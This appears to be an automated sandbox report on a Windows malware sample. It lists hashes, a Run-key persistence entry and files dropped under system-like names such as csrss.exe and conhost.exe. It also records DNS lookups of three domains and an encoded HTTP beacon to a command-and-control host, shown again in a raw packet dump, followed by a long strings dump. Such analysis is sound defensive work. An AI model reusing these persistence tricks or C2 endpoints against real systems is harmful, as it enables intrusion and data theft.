Analysis Date2014-08-22 00:58:12
MD5e8d4d58c7cbe317a1b10bc02bef44482
SHA121d634ce52085681bb81be0137c432466b2970ca

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 465752e070de02d8000e3f28863cb119 sha1: ce9b467b880061ab0bb00cab6d80b7bb76aa02ba size: 100864
Section.tls md5: fe35324cae61a98a1d32c78552f30531 sha1: a132c32a1ab5611d6c18c4a8323c137547839801 size: 1536
Section.data md5: 076a39c9c8e4ef0eb5ba483562482bf8 sha1: a506102e5e86616cade27b94d5595cb2796995a5 size: 67584
Section.reloc md5: db5e395a3fea00f7bc629ac8d5647009 sha1: 306cbd8c475331f6df86349e49483e10206b3cc2 size: 1024
Timestamp2005-09-24 08:44:40
PEhash9b751f88f175dc01481a691e918b6311e90e61ff
IMPhash4a647c36316b5236453f1bc2580ac57f

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS127.0.0.1
Winsock DNShappyratatuy.com
Winsock DNSsuperaudiosysrem.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Network Details:

DNScrazyleafdesign.com
Type: A
173.249.152.55
DNShappyratatuy.com
Type: A
DNSsuperaudiosysrem.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/facebook.png?v99=44&tq=gJ4WK%2FSUh6zGkUR8oY%2BQrMWTUj26kJHjyZpSK%2B%2FbxWq1SfkIYVhX
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 173.249.152.55:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f66 61636562 6f6f6b2e   /share/facebook.
0x00000020 (00032)   706e673f 7639393d 34342674 713d674a   png?v99=44&tq=gJ
0x00000030 (00048)   34574b25 32465355 68367a47 6b555238   4WK%2FSUh6zGkUR8
0x00000040 (00064)   6f592532 4251724d 5754556a 32366b4a   oY%2BQrMWTUj26kJ
0x00000050 (00080)   486a795a 70534b25 32422532 46627857   HjyZpSK%2B%2FbxW
0x00000060 (00096)   71315366 6b495956 68582048 5454502f   q1SfkIYVhX HTTP/
0x00000070 (00112)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000080 (00128)   20636c6f 73650d0a 486f7374 3a206372    close..Host: cr
0x00000090 (00144)   617a796c 65616664 65736967 6e2e636f   azyleafdesign.co
0x000000a0 (00160)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000b0 (00176)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000c0 (00192)   6c6c612f 322e300d 0a0d0a              lla/2.0....


Strings
{
YH4`
.
.D...
W
.
#h
..~.
 
4..2
x
080904b0
1484
3.0.0.1
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
0h0hN;
0hARh|
0hL&Rh
0h#PhKJ
^0h}Zd5m}
0KDHHT
0l}.l8
!\0ra6
#10hqC3
150he.
17k`h*a&I
1:CFi^
1drhph
1V3_*G
2:#Cf`
2h#1+D
}2hc&3
2h{J2h
2h:mrh
2hQf0hA
2hRhN:[U
2hs}rh
2ht6%i2h
&2wBMu
3@h5O`h
3 h@hk
:3Ph]Z]8c
3rh:O#
3V2hV#
4dXe(z
#4g9Z	
,4LG5]rhe
`4<p7oI
5&AP/;4
)]5juZ
5)<,<~S
63;S\o
+6(?`B
6Da*xXD
6~:&dnt
6ncKe7
~6'wpQ
7Ali h
7j`PHT
`*7l:-
8cW'+N
"8"I$ 
8j9dtoTlY}u1
8j]Nbh
^8=JPhK
8S^l@X
9phSt_
9X|0NN
!A-:/=A
{aDYi)x=
AI6W[:
}*ALnV>
AlphaBlend
a>]n h
.-'Av~
Ax{2k5B'G.
b3bcw	
b6h[){nt
beM-}3
Bh)A6<(
Bh[&!axKT
bhDoph}
bhha.G
Bh hAv
bh`hbh
bhH}Nrh	
bh hrh
bh%phY(
bhQ,SH
BhSPhK	v
bhuEx+
Bh/x.65
BLD`2	
BoL6li3
/Bz-)]
%C1Urh_
C:bh0h
ChAly:
c/k.M6
c{N>CA+x
CoCreateInstance
C/O\E!yB
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
 cq:^R
CreateFontIndirectA
c[tZ^bh*
cU!	M`h
"~CVJ6Y
CW}A.a
Cz8S8GWG
czUmWId".D
d1phc{
d?2hhx
@.data
d>Bh h]f
DeleteCriticalSection
DeleteObject
DGhg*O
D hgRh
d@h(Sj
D^L-qL
d{t^#6
e8Bh@h
e?^k9a
EnterCriticalSection
EnumResourceNamesW
Et0hfBh
EUz1Q`
[ew@h	XJ
EW.(@k
e+XEN-\{
EYxRhmL
f;>[{^
F h]g}
F	.K<g
flIs<(
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Fu#BA]i
G+	#``
G699$p
GDI32.dll
GeD#A(`h?z
GetACP
GetCPInfo
GetCPInfoExA
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
GLj=QM
GUx h];
GVb6-p
gWB.bW
g_w\}t
G${-*XpBL>"
[#-`h	
#<`h	.
."h0h'
h'{0h4
`h/5I*
h5n53Q
h6BhCcs
h7UWBh5
	H86eL
h\;91ZHJ
h9,?"h
@hAT	`h
 h?bh-^!`h4H
@hBhPh,
@hBhwJ
`h\cT:
hdH(ic
HeapSize
h'eSuV~udA
HFg&9c
h#\Fmph
hfO\1N
h$'frh
hg0hrh
hg"Nh8~Jw
[-@h`h
h;"hA)g
h`hFph
"h"hGF
h"h h_
h	`h`h
h+$"h`hf0h
h`h"h_rh
H@hn>h
h"hO8u
h`hqBh^
h"hW}>
hHxnrh
 hi:0hQ
h&ia9Ph
 hINYSI
hIph@h
hjI"h)
hJO]mtZ
`h~JQy
h+K`hO
hKrhph
`h-^&L
hLBhd<
hl(g}5J
hl@h2hL
hl"h-6
hl"h h
hMBh9~;2hNdk{l
h}MI9)o
h-Mn9Ph
? hmph
"hmQ],K{< hd
`hMvsPh
h;Mx&V
hnHKPh[
hnVbh0hN
`hNXx,!
hoKT*q
h+ph]|
h)Ph5{]n
hPh8Q~
hph hS
hphph$
hph%u*|^6
`hq)&6
h	qcbh
!hQE\H
 hqMW3c
$hqNq2h
hQse3n
Hr96,.
:`hRha
hrhAD\
H+Rhcv
hRhQg>
hRhSH)
hrhvIm
hs>.|g
h>SGE;
hS@h4rh
hs]j@U
hsrh;rh
@htDph
@h:t"h
?htsH{.
Hv3=Ph
hVaXRh
h+VT4Y
hw6sRhN
hYBhbh.
h._[yl
:;"hYSix
hz5e|Rh
hz`hbh
I7%U[B_o
IkbhPh
I)kbS%
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
iRhs)^
iZ!wZK@h+rh
.J0Q!?.
(J3^>"[
J5]O&N
^^J7C.
jiTxzM
j+OCg(:
JS8I)QW
J%TU{U
$j+;,WU4F
jWXO}9]rov
keRhrh
KERNEL32.dll
ks76+}d
k'~v"h=
kYm&=G<
]l!-#-
L2g*{=
lBh2hj
=L	.d`
ldbh!^
)ld;CY
LeaveCriticalSection
;>L= h
lh2.dl
lla\zZ
l=Ph8~e2h
	lRh.t
lstrlenW
|Lw)Vq
ly[Rh?
!m3]`h
"M|CYHx
&mIs3	Yo
"MRDDH
MSIMG32.dll
mTJ(/@hK
mU<]Gnz
MultiByteToWideChar
n1y`h^
Nb\q@O
[NF	1H
}N$\@h
nH<Ru-M'
nI<nag
,NkHLC'
}NKo>1
NmlJW6
nn	m`h
Nq:Ag,
%nRh2h
NV:\Bh
nZ7<%/
Ob)>.LI
oG	):$
[o&' h
O@hAph
ohPhug:
{OJ[ h?
ole32.dll
:&omrh.
Ot*St/
Pd87pb
]ph30h
ph8sRh
ph$bhXg
PhNIA"h
Pho)`h-
phPhEo{
[ph&Qf
Phrh,F
PhRh`h
[Phrhrh
phU3/AT
phXFPh h
P+-@\k
&PR,!W
!<Ps=f4
p<Xi/1
/q2hbh
	q(}`7
<'QCvn
*Q;fTj
}_qLZ:
QOPh:k
qT>rh4
QueryPerformanceCounter
(qu-'r
QWf+vCU
RaiseException
r~<`@"C
.reloc
(RhBha
Rh/e"h h
Rh\F,2h[
RhGdHC
\rhm@h
Rho$}>
rhRhqV{
rhV)~F
rkZ|<l
r'{m~SF
@rZuw"
<s2hC8
S~_d@h
SDrhn+
SelectObject
SetHandleCount
S'G@$a
sH>eBh
]|s	:l
StringFromGUID2
)s	V18
$<sV1k
t(1+BI
~.t7g3
t_8O,e$&
t}:^8v
^tA h#
t`E	uS
!This program cannot be run in DOS mode.
ti(7@h
TlsGetValue
TlsSetValue
@[Tol~
TP[=|J
TransparentBlt
&tt^m@
TU<pqf
twk:ph
ty,"Bw
tz99m1
u` |+"
|U(0h}#
%u0hBh
<u.2h'Y
(u5	o^`
u79vRJPy
uDhE<9
u\*%E:
u} hnU
UK}\[+@hph*H
UnhandledExceptionFilter
U$Phh h
v2h"h;D
= V70{
v>9m0hh)Phl
<V9^rh,
?v;];C
}Vm'o$
=VNhW7i!0h@hy
%V]Q+/
VRs	g`
&){VV7
W5n`hC
$w ]\.B
/wDobR@
w]#@hE
WideCharToMultiByte
WL5R?_atq
w*Qk%]z
WriteFile
ws=0vW
wU@hwFu
|X0hXD
!-x_dQbh<
x"h^`hG
X/icPP"P7
]Xik2hv
\xj N8
xLa^CE
'X$lt)
$}+y2e\Lq;
|]ybF/[
Y@h@hL
y"hnph
Y,U~)uq
z2hMBh
z_>A2-|
ZEcrht
zkrhov
Z|MpR&
z%{nSq
zO[%TGx
Z%ueph
z?W{-:
\`#zZ{